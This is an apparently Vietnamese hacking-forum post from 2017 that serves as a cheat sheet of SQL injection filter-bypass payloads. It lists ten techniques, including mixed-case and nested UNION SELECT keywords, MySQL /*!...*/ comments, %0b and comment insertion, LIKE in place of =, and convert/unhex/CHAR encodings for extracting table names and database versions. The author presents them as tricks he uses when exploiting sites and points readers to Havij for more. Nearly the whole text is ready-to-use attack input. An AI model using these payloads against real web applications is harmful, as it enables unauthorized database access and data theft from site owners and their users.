Một số cách Bypass SQL injection

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

 1. Mickey

  Mickey Hacking For Hacker Staff Member

  Một số trick mình hay dùng khi khai thác.Thường thì chỉ chặn select tuy nhiên có 1 vài trường hợp chặn luôn cả khoảng trắng ở url khi đấy thay các ký tự như /**/ + %252f%252a*/ .... muốn tìm thêm thì nhìn vào setting của havij có mấy cái đấy. Nhưng đấy là số ít, giờ ta vào phần chính:

  Cách 1: thay ký tự thường bằng ký tự hoa

  id=1+UnIoN SeLeCT 1,2,3,4-- -

  Cách 2: dùng cặp thẻ /*!code*/

  id=1+/*!UnIoN*/ /*!SeLeCT*/ 1,2,3,4-- -

  Cách 3: dùng like thay cho = (khi dấu = bị chặn)

  /*!TaBlE_ScHeMa*/+like+database()– -

  Cách 4: Lồng Union và select

  id=1+UNIunionON+SeLselectECT+1,2,3–

  Cách 5 thêm ký tự null hoặc các ký tự đặc biệt vào giữa:

  sel%0bect+1,2,3
  id=1+uni*on+sel*ect+1,2,3–+
  id=1+(UnIoN)+(SelECT)+
  id=1+(UnIoN+SeLeCT)+
  id=1+(UnI)(oN)+(SeL)(EcT)
  id=1+’UnI”On’+'SeL”ECT’

  Cách 6: dùng hàm convert():
  convert(group_concat(table_name)+using+ascii)
  convert(version() using latin1)
  aes_decrypt(aes_encrypt(version(),1),1)
  unhex(hex(@@version))
  cast(version()+as+binary)
  convert(version(),binary)
  convert(version()+using+binary)

  Cách 7: dùng char()
  CHAR(117, 115, 101, 114, 115)

  Cách 8: show table ẩn:

  group_concat(unhex(hex(table_name)))

  cách 9: select
  UNION all /*!50000SELECT*/

  Cách 10 (ít dùng)thêm khoảng trắng tách từ
  information_schema. tables thay cho information_schema.tables
   

Share This Page